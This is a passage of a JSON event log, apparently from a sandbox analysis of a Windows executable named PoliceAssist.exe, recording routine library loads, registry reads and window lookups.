          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,869",
        "eid": 18,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,885",
        "eid": 19,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,900",
        "eid": 20,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:36,322",
        "eid": 21,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:36,322",
        "eid": 22,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:36,322",
        "eid": 23,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,016",
        "eid": 24,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest",
          "content": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,016",
        "eid": 25,
        "data": {
          "file": "LPK",
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,016",
        "eid": 26,
        "data": {
          "file": "GDI32",
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,047",
        "eid": 27,
        "data": {
          "file": "C:\\Windows\\system32\\rpcss.dll",
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,047",
        "eid": 28,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\STE",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,047",
        "eid": 29,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\Enabled",
          "content": "0"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,047",
        "eid": 30,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,047",
        "eid": 31,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\MDMEnabled",
          "content": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,047",
        "eid": 32,
        "data": {
          "file": "C:\\Windows\\System32\\uxtheme.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffede5b0000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,047",
        "eid": 33,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,062",
        "eid": 34,
        "data": {
          "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize\\AppsUseLightTheme",
          "content": "1"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,062",
        "eid": 35,
        "data": {
          "file": "ntdll.dll",
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,062",
        "eid": 36,
        "data": {
          "file": "user32",
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,062",
        "eid": 37,
        "data": {
          "file": "user32",
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,062",
        "eid": 38,
        "data": {
          "file": "user32",
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,062",
        "eid": 39,
        "data": {
          "file": "kernel32",
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,062",
        "eid": 40,
        "data": {
          "file": "comctl32",
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,062",
        "eid": 41,
        "data": {
          "file": "gdi32",
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "findwindow",
        "object": "windowname",
        "timestamp": "2025-11-20 10:58:26,062",
        "eid": 42,
        "data": {
          "classname": "AutoHotkey",
          "windowname": "C:\\Temp\\PoliceAssist.exe"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,062",
        "eid": 43,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\ru-RU",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,062",
        "eid": 44,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\ru-RU",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,062",
        "eid": 45,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,062",
        "eid": 46,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
          "content": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,078",
        "eid": 47,
        "data": {
          "file": "ntdll.dll",
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,078",
        "eid": 48,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,094",
        "eid": 49,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\Disable",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,094",
        "eid": 50,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\DataFilePath",
          "content": "C:\\Windows\\Fonts\\staticcache.dat"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 51,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane1",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 52,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane2",
          "content": "SimSun-ExtB"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 53,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane3",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 54,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane4",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 55,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane5",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 56,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane6",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 57,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane7",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 58,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane8",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 59,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane9",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 60,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane10",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 61,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane11",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 62,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane12",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 63,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane13",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 64,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane14",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 65,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane15",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 66,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane16",
          "content": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 67,
        "data": {
          "file": "comctl32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffecf5a0000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 68,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 69,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx",
          "content": "kernel32.dll"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 70,
        "data": {
          "file": "kernel32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee1660000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 71,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 72,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru-RU",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 73,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru",
          "content": "{0000004A-57EE-1E5C-00B4-D0000BB1E11E}"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,109",
        "eid": 74,
        "data": {
          "file": "user32",
          "pathtofile": null,
          "moduleaddress": "0x7ffee1f70000"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,125",
        "eid": 75,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest",
          "content": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,125",
        "eid": 76,
        "data": {
          "file": "comctl32",
          "pathtofile": null,
          "moduleaddress": "0x7ffecf5a0000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,125",
        "eid": 77,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "findwindow",
        "object": "windowname",
        "timestamp": "2025-11-20 10:58:26,141",
        "eid": 78,
        "data": {
          "classname": "Shell_TrayWnd",
          "windowname": ""
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,141",
        "eid": 79,
        "data": {
          "file": "api-ms-win-eventing-provider-l1-1-0.dll",
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,141",
        "eid": 80,
        "data": {
          "file": "api-ms-win-core-synch-l1-2-0.dll",
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 81,
        "data": {
          "file": "ntdll.dll",
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 82,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Category",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 83,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Name",
          "content": "ProgramFilesX86"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 84,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParentFolder",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 85,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Description",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 86,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\RelativePath",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 87,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParsingName",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 88,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InfoTip",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 89,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalizedName",
          "content": "@%SystemRoot%\\system32\\shell32.dll,-21817"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 90,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Icon",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 91,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Security",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 92,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResource",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 93,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResourceType",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 94,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalRedirectOnly",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 95,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Roamable",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 96,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PreCreate",
          "content": "1"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 97,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Stream",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 98,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PublishExpandedPath",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 99,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\DefinitionFlags",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 100,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Attributes",
          "content": "1"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 101,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\FolderTypeID",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 102,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InitFolderHandler",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 103,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir (x86)",
          "content": "C:\\Program Files (x86)"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 104,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Category",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 105,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Name",
          "content": "ProgramFilesX64"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 106,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParentFolder",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 107,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Description",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 108,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\RelativePath",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 109,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParsingName",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 110,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InfoTip",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 111,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalizedName",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 112,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Icon",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 113,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Security",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 114,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResource",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 115,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResourceType",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 116,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalRedirectOnly",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 117,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Roamable",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 118,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PreCreate",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 119,
        "data": {
